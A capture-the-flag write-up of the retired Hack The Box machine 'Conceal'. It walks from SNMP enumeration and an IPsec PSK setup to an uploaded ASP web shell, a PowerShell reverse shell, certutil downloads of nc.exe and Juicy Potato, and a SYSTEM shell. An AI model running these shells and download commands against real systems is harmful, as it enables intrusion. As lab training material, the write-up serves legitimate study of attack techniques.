Hack The Box - Conceal

Quick Summary

Hey guys today Conceal retired and here’s my write-up about it. Conceal was a straightforward fun box, The only tricky part about it is gaining IPSEC connection to gain access to some filtered services. That first part involved some guessing but after that everything is simple and very straightforward. I liked this machine and it was a very fun one. It’s a windows machine and its ip is 10.10.10.116 , I added it to /etc/hosts as conceal.htb . Let’s jump right in.



Nmap

As always we will start with nmap to scan for open ports and services.

nmap -sV -sT -sC conceal.htb



And we got nothing !

I ran another nmap UDP scan on all ports :

nmap -vvv -sU -o nmapudp conceal.htb --max-retries 0

The output was too long so I will show the only important part :





It was not sure about port 161, but it showed that port 500 is open.

I ran a third scan on ports 500 and 161 :

nmap -p 161,500 -sV -sU -sC conceal.htb



Full Output :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

# Nmap 7.70 scan initiated Fri May 17 16:37:52 2019 as: nmap -p 161,500 -sV -sU -sC -o nmapudp2 conceal.htb

Nmap scan report for conceal.htb (10.10.10.116)

Host is up (0.20s latency).



PORT STATE SERVICE VERSION

161/udp open snmp SNMPv1 server (public)

| snmp-interfaces:

| Software Loopback Interface 1\x00

| IP address: 127.0.0.1 Netmask: 255.0.0.0

| Type: softwareLoopback Speed: 1 Gbps

| Traffic stats: 0.00 Kb sent, 0.00 Kb received

| Intel(R) 82574L Gigabit Network Connection\x00

| IP address: 10.10.10.116 Netmask: 255.255.255.0

| MAC address: 00:50:56:b9:55:a7 (VMware)

| Type: ethernetCsmacd Speed: 1 Gbps

| Traffic stats: 399.03 Kb sent, 6.41 Mb received

| Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000\x00

| MAC address: 00:50:56:b9:55:a7 (VMware)

| Type: ethernetCsmacd Speed: 1 Gbps

| Traffic stats: 399.03 Kb sent, 6.41 Mb received

| Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000\x00

| MAC address: 00:50:56:b9:55:a7 (VMware)

| Type: ethernetCsmacd Speed: 1 Gbps

| Traffic stats: 399.03 Kb sent, 6.41 Mb received

| Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000\x00

| MAC address: 00:50:56:b9:55:a7 (VMware)

| Type: ethernetCsmacd Speed: 1 Gbps

|_ Traffic stats: 399.03 Kb sent, 6.41 Mb received

| snmp-netstat:

| TCP 0.0.0.0:21 0.0.0.0:0

| TCP 0.0.0.0:80 0.0.0.0:0

| TCP 0.0.0.0:135 0.0.0.0:0

| TCP 0.0.0.0:445 0.0.0.0:0

| TCP 0.0.0.0:49664 0.0.0.0:0

| TCP 0.0.0.0:49665 0.0.0.0:0

| TCP 0.0.0.0:49666 0.0.0.0:0

| TCP 0.0.0.0:49667 0.0.0.0:0

| TCP 0.0.0.0:49668 0.0.0.0:0

| TCP 0.0.0.0:49669 0.0.0.0:0

| TCP 0.0.0.0:49670 0.0.0.0:0

| TCP 10.10.10.116:139 0.0.0.0:0

| UDP 0.0.0.0:123 *:*

| UDP 0.0.0.0:161 *:*

| UDP 0.0.0.0:500 *:*

| UDP 0.0.0.0:4500 *:*

| UDP 0.0.0.0:5050 *:*

| UDP 0.0.0.0:5353 *:*

| UDP 0.0.0.0:5355 *:*

| UDP 10.10.10.116:137 *:*

| UDP 10.10.10.116:138 *:*

| UDP 10.10.10.116:1900 *:*

| UDP 10.10.10.116:65496 *:*

| UDP 127.0.0.1:1900 *:*

|_ UDP 127.0.0.1:65497 *:*

| snmp-processes:

| 1:

| Name: System Idle Process

| 4:

| Name: System

| 308:

| Name: smss.exe

| 348:

| Name: svchost.exe

| Path: C:\Windows\System32\

| Params: -k LocalSystemNetworkRestricted

| 392:

| Name: csrss.exe

| 468:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k LocalService

| 472:

| Name: wininit.exe

| 484:

| Name: csrss.exe

| 564:

| Name: winlogon.exe

| 584:

| Name: services.exe

| 616:

| Name: lsass.exe

| Path: C:\Windows\system32\

| 696:

| Name: fontdrvhost.exe

| 704:

| Name: fontdrvhost.exe

| 712:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k DcomLaunch

| 812:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k RPCSS

| 900:

| Name: svchost.exe

| Path: C:\Windows\System32\

| Params: -k NetworkService

| 908:

| Name: dwm.exe

| 940:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k netsvcs

| 976:

| Name: svchost.exe

| Path: C:\Windows\System32\

| Params: -k LocalServiceNetworkRestricted

| 984:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k LocalServiceNoNetwork

| 1140:

| Name: vmacthlp.exe

| Path: C:\Program Files\VMware\VMware Tools\

| 1232:

| Name: svchost.exe

| Path: C:\Windows\System32\

| Params: -k LocalServiceNetworkRestricted

| 1248:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k LocalSystemNetworkRestricted

| 1292:

| Name: LogonUI.exe

| Params: /flags:0x0 /state0:0xa3a2c855 /state1:0x41c64e6d

| 1392:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k LocalServiceNetworkRestricted

| 1400:

| Name: svchost.exe

| Path: C:\Windows\System32\

| Params: -k LocalServiceNetworkRestricted

| 1492:

| Name: spoolsv.exe

| Path: C:\Windows\System32\

| 1728:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k apphost

| 1748:

| Name: svchost.exe

| Path: C:\Windows\System32\

| Params: -k utcsvc

| 1788:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k ftpsvc

| 1856:

| Name: SecurityHealthService.exe

| 1868:

| Name: snmp.exe

| Path: C:\Windows\System32\

| 1892:

| Name: VGAuthService.exe

| Path: C:\Program Files\VMware\VMware Tools\VMware VGAuth\

| 1912:

| Name: vmtoolsd.exe

| Path: C:\Program Files\VMware\VMware Tools\

| 1932:

| Name: ManagementAgentHost.exe

| Path: C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\

| 1956:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k iissvcs

| 1980:

| Name: MsMpEng.exe

| 2068:

| Name: Memory Compression

| 2204:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k LocalServiceAndNoImpersonation

| 2444:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k NetworkServiceNetworkRestricted

| 2952:

| Name: WmiPrvSE.exe

| Path: C:\Windows\system32\wbem\

| 2976:

| Name: NisSrv.exe

| 3052:

| Name: dllhost.exe

| Path: C:\Windows\system32\

| Params: /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

| 3132:

| Name: SearchIndexer.exe

| Path: C:\Windows\system32\

| Params: /Embedding

| 3280:

| Name: svchost.exe

| Path: C:\Windows\system32\

| Params: -k appmodel

| 3376:

| Name: msdtc.exe

| Path: C:\Windows\System32\

| 3948:

| Name: svchost.exe

| 5004:

| Name: SearchFilterHost.exe

| Path: C:\Windows\system32\

| Params: 0 700 704 712 8192 708

| 5032:

| Name: SearchProtocolHost.exe

| Path: C:\Windows\system32\

|_ Params: Global\UsGthrFltPipeMssGthrPipe23_ Global\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 "Software\Microsoft\Windows Search" "Moz

| snmp-sysdescr: Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)

|_ System uptime: 2h08m26.61s (770661 timeticks)

| snmp-win32-services:

| Application Host Helper Service

| Background Intelligent Transfer Service

| Background Tasks Infrastructure Service

| Base Filtering Engine

| CNG Key Isolation

| COM+ Event System

| COM+ System Application

| Client License Service (ClipSVC)

| Connected Devices Platform Service

| Connected User Experiences and Telemetry

| CoreMessaging

| Cryptographic Services

| DCOM Server Process Launcher

| DHCP Client

| DNS Client

| Data Sharing Service

| Data Usage

| Device Setup Manager

| Diagnostic Policy Service

| Diagnostic Service Host

| Distributed Link Tracking Client

| Distributed Transaction Coordinator

| Geolocation Service

| Group Policy Client

| IKE and AuthIP IPsec Keying Modules

| IP Helper

| IPsec Policy Agent

| Local Session Manager

| Microsoft Account Sign-in Assistant

| Microsoft FTP Service

| Network Connection Broker

| Network List Service

| Network Location Awareness

| Network Store Interface Service

| Plug and Play

| Power

| Print Spooler

| Program Compatibility Assistant Service

| RPC Endpoint Mapper

| Remote Procedure Call (RPC)

| SNMP Service

| SSDP Discovery

| Security Accounts Manager

| Security Center

| Server

| Shell Hardware Detection

| State Repository Service

| Storage Service

| Superfetch

| System Event Notification Service

| System Events Broker

| TCP/IP NetBIOS Helper

| Task Scheduler

| Themes

| Tile Data model server

| Time Broker

| TokenBroker

| User Manager

| User Profile Service

| VMware Alias Manager and Ticket Service

| VMware CAF Management Agent Service

| VMware Physical Disk Helper Service

| VMware Tools

| WinHTTP Web Proxy Auto-Discovery Service

| Windows Audio

| Windows Audio Endpoint Builder

| Windows Connection Manager

| Windows Defender Antivirus Network Inspection Service

| Windows Defender Antivirus Service

| Windows Defender Security Centre Service

| Windows Driver Foundation - User-mode Driver Framework

| Windows Event Log

| Windows Firewall

| Windows Font Cache Service

| Windows Management Instrumentation

| Windows Process Activation Service

| Windows Push Notifications System Service

| Windows Search

| Windows Time

| Workstation

|_ World Wide Web Publishing Service

| snmp-win32-software:

| Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2018-10-12T20:10:30

| Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2018-10-12T20:10:22

|_ VMware Tools; 2018-10-12T20:11:02

| snmp-win32-users:

| Administrator

| DefaultAccount

| Destitute

|_ Guest

500/udp open isakmp Microsoft Windows 8

| ike-version:

| vendor_id: Microsoft Windows 8

| attributes:

| MS NT5 ISAKMPOAKLEY

| RFC 3947 NAT-T

| draft-ietf-ipsec-nat-t-ike-02



| IKE FRAGMENTATION

| MS-Negotiation Discovery Capable

|_ IKE CGA version 1

Service Info: Host: Conceal; OS: Windows 8; CPE: cpe:/o:microsoft:windows:8, cpe:/o:microsoft:windows



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Fri May 17 16:42:05 2019 -- 1 IP address (1 host up) scanned in 253.58 seconds



We have two services to enumerate. isakmp which is IPSEC and snmp .

Snmp Enumeration

I started with snmpwalk :

snmpwalk -c public -v 1 conceal.htb

The output was very long but we only need this first part :



We have a password hash for the IPSEC connection : 9C8B1A372B1878851BE2C097031B6E43

I used crackstation to crack it and I got this result :



Great ! Now we need to enumerate the ike vpn service to know how to connect to it.

ike-scan , Setting up The Connection

I ran ike-scan and got these results :



I installed strongswan to set up the IPSEC connection. With the help of the info I got from ike-scan and some guessing I could come up with this configuration which worked :

/etc/ipsec.conf :



1

2

3

4

5

6

7

8

9

10

conn rick-to-conceal

authby=secret

auto=route

keyexchange=ikev1

ike=3des-sha1-modp1024

left=10.10.xx.xx

right=10.10.10.116

type=transport

esp=3des-sha1

rightprotoport=tcp



/etc/ipsec.secrets :



1

10.10.xx.xx 10.10.10.116 : PSK "Dudecake1!"



I started ipsec then I initialized the connection :

ipsec start

ipsec up rick-to-conceal



It worked fine, now we are connected to a vpn network let’s see what new services can we get.

Nmap (Second Time)

nmap -sV -sT -sC conceal.htb



We got ftp on port 21 , http on port 80 and smb on port 445. I wanted to check ftp first and see if I can authenticate anonymously.

FTP, File Upload, Reverse Shell and User Flag



It worked but there was literally nothing on that ftp server. I uploaded a test file to check if I have write permissions on that ftp server and I had.



I Checked the http service and there was only the default IIS page :



I ran gobuster with /usr/share/wordlists/dirb/common.txt and got only one directory called /upload :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

gobuster -u http://conceal.htb/ -w /usr/share/wordlists/dirb/common.txt



=====================================================

Gobuster v2.0.0 OJ Reeves (@TheColonial)

=====================================================

[+] Mode : dir

[+] Url/Domain : http://conceal.htb/

[+] Threads : 10

[+] Wordlist : /usr/share/wordlists/dirb/common.txt

[+] Status codes : 200,204,301,302,307,403

[+] Timeout : 10s

=====================================================

2019/05/17 17:18:57 Starting gobuster

=====================================================

/upload (Status: 301)

=====================================================

2019/05/17 17:28:23 Finished

=====================================================



I went to /upload and found my test file :



Great ! I uploaded an asp shell to get remote code execution :



shell.asp :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50





















< %

Set oScript = Server.CreateObject( " WSCRIPT.SHELL ")

Set oScriptNet = Server.CreateObject( " WSCRIPT.NETWORK ")

Set oFileSys = Server.CreateObject( " Scripting.FileSystemObject ")

Function getCommandOutput ( theCommand )

Dim objShell , objCmdExec

Set objShell = CreateObject( " WScript.Shell ")

Set objCmdExec = objshell.exec(thecommand)

getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>





< HTML >

< BODY >

< FORM action = "" method = "GET" >

< input type = "text" name = "cmd" size = 45 value = "<%= szCMD %>" >

< input type = "submit" value = "Run" >

</ FORM >

< PRE >

< %= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>

< %Response.Write(Request.ServerVariables("server_name"))% >

< p >

< b > The server's port: </ b >

< %Response.Write(Request.ServerVariables("server_port"))% >

</ p >

< p >

< b > The server's software: </ b >

< %Response.Write(Request.ServerVariables("server_software"))% >

</ p >

< p >

< b > The server's software: </ b >

< %Response.Write(Request.ServerVariables("LOCAL_ADDR"))% >

< % szCMD = request( " cmd ")

thisDir = getCommandOutput( " cmd / c " & szCMD )

Response.Write ( thisDir )%>

</ p >



</ BODY >

</ HTML >







I got a powershell reverse shell :



Payload :

1

powershell -nop -c " $client = New-Object System.Net.Sockets.TCPClient('10.10.xx.xx',1337); $stream = $client .GetStream();[byte[]] $bytes = 0..65535|%{0};while(( $i = $stream .Read( $bytes , 0, $bytes .Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString( $bytes ,0, $i ); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes( $sendback2 ); $stream .Write( $sendbyte ,0, $sendbyte .Length); $stream .Flush()}; $client .Close()"





We got user.

SeImpersonatePrivilege, Juicy Potato, Privilege Escalation and Root Flag

After getting user the privilege escalation is easy and straightforward. Before doing any enumeration I checked my privileges as Destitute and I found that I had the SeImpersonatePrivilege .



This means that we can apply the famous attack Juicy Potato . You can read about it on the official github repository. We need to know the version of this windows to pick the right clsid .

systeminfo



It’s Microsoft Windows 10 Enterprise . I got the clsid of wuauserv from here which is :

{e60687f7-01a1-40aa-86ac-db1cbf673334}

I got a compiled binary of Juicy Potato from the github repository. I hosted it on a python simple http server then I downloaded it on the machine with certutil :

1

certutil -urlcache -split -f http://10.10.xx.xx/juicypotato.exe juicypotato.exe





However I had some problems with my powershell reverse shell and it couldn’t run juicypotato.exe properly so I got another cmd shell with nc :

1

certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe



nc.exe -e cmd.exe 10.10.xx.xx 1339





I created a bat file that executes : nc.exe -e cmd.exe 10.10.xx.xx 1340 to get me a reverse shell :

1

echo C:\users\Destitute\appdata\local\temp

c.exe -e cmd.exe 10.10.xx.xx 1340 > rev.bat



Then I ran juicypotato.exe and made it execute that bat file :

1

juicypotato.exe -p C:\users\Destitute\appdata\local\temp\rev.bat -l 1340 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}





It worked fine and we got a reverse shell as nt authority\system





And we owned root !

That’s it , Feedback is appreciated !

Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Lightweight

Next Hack The Box write-up : Hack The Box - Chaos